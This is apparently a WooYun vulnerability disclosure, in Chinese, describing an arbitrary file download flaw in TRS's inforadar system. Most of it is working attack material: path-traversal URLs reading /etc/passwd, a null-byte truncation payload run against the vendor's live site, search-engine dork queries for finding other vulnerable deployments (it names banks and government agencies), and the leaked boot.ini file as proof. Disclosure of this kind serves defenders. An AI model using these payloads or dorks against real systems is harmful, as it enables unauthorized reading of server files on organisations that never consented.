trs某系统任意文件下载漏洞第二弹

### 简要描述： 感觉挺严重的问题，存在的地方包括但是不局限银行、政府等行业。 ### 详细说明： exp inforadar/jsp/util/file_download.jsp?filePath=../../../../../../../etc/passwd exp2 http://inforadar.trs.com.cn/jsp/util/file_download.jsp?filePath=c:%5Cboot.ini%00.xml 官方网站需要加个截断，就可以了 应该是神马雷达系统。 很多地方都有这问题。 但是google找不到多少个，因为很多都是二次开发，目录明改变了。 比如招行。。。 [WooYun: 招商银行某系统任意文件下载漏洞](http://www.wooyun.org/bugs/wooyun-2013-040001) google http://203.208.46.145/#newwindow=1&q=intitle:trs+inurl:inforadar&start=10 http://203.208.46.145/#filter=0&newwindow=1&q=inurl:jsp/portalsearch baidu http://www.baidu.com/s?wd=inurl%3Ainforadar&rsv_spt=1&issp=1&rsv_bp=0&ie=utf-8&tn=baiduhome_pg&rsv_sug3=13&rsv_sug=0&rsv_sug1=12&rsv_sug4=777 ### 漏洞证明： [WooYun: 招商银行某系统任意文件下载漏洞](http://www.wooyun.org/bugs/wooyun-2013-040001) [WooYun: 福建省人民政府某系统任意文件下载漏洞](http://www.wooyun.org/bugs/wooyun-2013-040003) trs官方 ``` [boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS [operating systems] multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Windows Server 2003, Enterprise" /noexecute=optout /fastdetect ``` 貌似windows的boot.ini都一样 官方用的是2003系统。。